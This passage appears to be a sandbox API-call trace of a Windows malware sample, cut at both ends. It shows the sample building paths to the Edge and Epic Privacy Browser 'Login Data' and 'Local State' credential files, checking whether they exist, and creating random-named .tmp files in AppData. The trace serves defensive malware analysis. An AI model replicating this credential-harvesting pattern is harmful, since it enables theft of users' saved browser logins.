HALPmcxz\\AppData\\Local" [0203.244] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.244] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Local State") returned 43 [0203.244] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.244] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Local State") returned 43 [0203.244] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Epic Privacy Browser\\User Data\\Local State" | out: lpString1="\\Epic Privacy Browser\\User Data\\Local State") returned="\\Epic Privacy Browser\\User Data\\Local State" [0203.244] lstrlenW (lpString="\\Epic Privacy Browser\\User Data\\Local State") returned 43 [0203.244] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.244] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.244] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.245] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.245] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" [0203.245] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.246] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0203.246] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.246] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.246] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.247] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.247] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.247] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.247] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.247] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.247] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.247] lstrlenW (lpString="\\") returned 1 [0203.248] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.248] lstrlenW (lpString="\\") returned 1 [0203.248] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.248] lstrlenW (lpString="\\") returned 1 [0203.248] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.248] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.248] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.248] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.249] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.249] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.249] GetProcessHeap () returned 0x900000 [0203.249] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.249] lstrlenA (lpString="yczoCGI") returned 7 [0203.249] lstrlenA (lpString="yczoCGI") returned 7 [0203.249] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.250] lstrcpyA (in: lpString1=0x2d80000, lpString2="yczoCGI" | out: lpString1="yczoCGI") returned="yczoCGI" [0203.250] lstrlenA (lpString="yczoCGI") returned 7 [0203.250] lstrlenA (lpString="yczoCGI") returned 7 [0203.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.250] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.250] lstrlenA (lpString="yczoCGI") returned 7 [0203.250] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="yczoCGI") returned 8 [0203.250] lstrlenW (lpString="yczoCGI") returned 7 [0203.250] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.250] lstrlenW (lpString="yczoCGI") returned 7 [0203.250] lstrcpyW (in: lpString1=0x2df0000, lpString2="yczoCGI" | out: lpString1="yczoCGI") returned="yczoCGI" [0203.251] lstrlenW (lpString="yczoCGI") returned 7 [0203.251] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.251] lstrcpyW (in: lpString1=0x2e20000, lpString2="yczoCGI" | out: lpString1="yczoCGI") returned="yczoCGI" [0203.251] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.251] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.252] lstrlenW (lpString="yczoCGI") returned 7 [0203.252] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.252] lstrcatW (in: lpString1="", lpString2="yczoCGI" | out: lpString1="yczoCGI") returned="yczoCGI" [0203.252] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.252] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.253] GetProcessHeap () returned 0x900000 [0203.253] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.253] lstrlenW (lpString="yczoCGI") returned 7 [0203.253] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.253] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.253] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.253] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.253] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="yczoCGI" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI" [0203.253] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.254] lstrlenW (lpString=".tmp") returned 4 [0203.254] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.254] lstrlenW (lpString=".tmp") returned 4 [0203.254] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.254] lstrlenW (lpString=".tmp") returned 4 [0203.254] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI") returned 53 [0203.254] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.254] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.255] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yczoCGI.tmp" [0203.255] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.255] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.255] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.255] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.256] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.256] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.256] lstrlenW (lpString="\\") returned 1 [0203.256] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.256] lstrlenW (lpString="\\") returned 1 [0203.256] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.256] lstrlenW (lpString="\\") returned 1 [0203.256] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.256] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.256] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.257] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.257] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.257] GetProcessHeap () returned 0x900000 [0203.257] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.257] lstrlenA (lpString="JJgijga") returned 7 [0203.257] lstrlenA (lpString="JJgijga") returned 7 [0203.257] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.257] lstrcpyA (in: lpString1=0x2d80000, lpString2="JJgijga" | out: lpString1="JJgijga") returned="JJgijga" [0203.257] lstrlenA (lpString="JJgijga") returned 7 [0203.258] lstrlenA (lpString="JJgijga") returned 7 [0203.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.258] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.258] lstrlenA (lpString="JJgijga") returned 7 [0203.258] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="JJgijga") returned 8 [0203.258] lstrlenW (lpString="JJgijga") returned 7 [0203.258] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.258] lstrlenW (lpString="JJgijga") returned 7 [0203.258] lstrcpyW (in: lpString1=0x2e20000, lpString2="JJgijga" | out: lpString1="JJgijga") returned="JJgijga" [0203.258] lstrlenW (lpString="JJgijga") returned 7 [0203.258] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.259] lstrcpyW (in: lpString1=0x2eb0000, lpString2="JJgijga" | out: lpString1="JJgijga") returned="JJgijga" [0203.259] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.259] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.259] lstrlenW (lpString="JJgijga") returned 7 [0203.259] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.259] lstrcatW (in: lpString1="", lpString2="JJgijga" | out: lpString1="JJgijga") returned="JJgijga" [0203.259] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.260] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.260] GetProcessHeap () returned 0x900000 [0203.260] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.260] lstrlenW (lpString="JJgijga") returned 7 [0203.260] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.260] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.260] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.260] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.260] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="JJgijga" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga" [0203.260] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.261] lstrlenW (lpString=".tmp") returned 4 [0203.261] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.261] lstrlenW (lpString=".tmp") returned 4 [0203.261] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.261] lstrlenW (lpString=".tmp") returned 4 [0203.261] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga") returned 53 [0203.261] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.261] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.261] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.262] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JJgijga.tmp" [0203.262] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.262] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.262] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.262] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.262] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.262] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.262] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.262] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.263] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.263] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.263] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 44 [0203.263] VirtualAlloc (lpAddress=0x0, dwSize=0x5a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.263] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 44 [0203.263] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Microsoft\\Edge\\User Data\\Default\\Login Data" | out: lpString1="\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned="\\Microsoft\\Edge\\User Data\\Default\\Login Data" [0203.263] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 44 [0203.263] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.263] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.263] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.264] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.264] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data" [0203.264] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.264] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.264] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.264] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.265] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.265] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.265] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.265] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.265] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.265] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.265] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Local State") returned 37 [0203.266] VirtualAlloc (lpAddress=0x0, dwSize=0x4c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.266] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Local State") returned 37 [0203.266] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Microsoft\\Edge\\User Data\\Local State" | out: lpString1="\\Microsoft\\Edge\\User Data\\Local State") returned="\\Microsoft\\Edge\\User Data\\Local State" [0203.266] lstrlenW (lpString="\\Microsoft\\Edge\\User Data\\Local State") returned 37 [0203.266] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.266] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.266] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.266] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.267] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" [0203.267] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.267] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 0 [0203.267] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.268] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.268] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.285] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.285] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.285] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.286] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.286] lstrlenW (lpString="\\") returned 1 [0203.286] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.286] lstrlenW (lpString="\\") returned 1 [0203.286] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.286] lstrlenW (lpString="\\") returned 1 [0203.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.286] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.286] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.287] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.287] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.287] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.287] GetProcessHeap () returned 0x900000 [0203.287] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.287] lstrlenA (lpString="EInjvyH") returned 7 [0203.287] lstrlenA (lpString="EInjvyH") returned 7 [0203.287] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.287] lstrcpyA (in: lpString1=0x2d80000, lpString2="EInjvyH" | out: lpString1="EInjvyH") returned="EInjvyH" [0203.287] lstrlenA (lpString="EInjvyH") returned 7 [0203.288] lstrlenA (lpString="EInjvyH") returned 7 [0203.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.288] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.288] lstrlenA (lpString="EInjvyH") returned 7 [0203.288] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="EInjvyH") returned 8 [0203.288] lstrlenW (lpString="EInjvyH") returned 7 [0203.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.288] lstrlenW (lpString="EInjvyH") returned 7 [0203.288] lstrcpyW (in: lpString1=0x2df0000, lpString2="EInjvyH" | out: lpString1="EInjvyH") returned="EInjvyH" [0203.288] lstrlenW (lpString="EInjvyH") returned 7 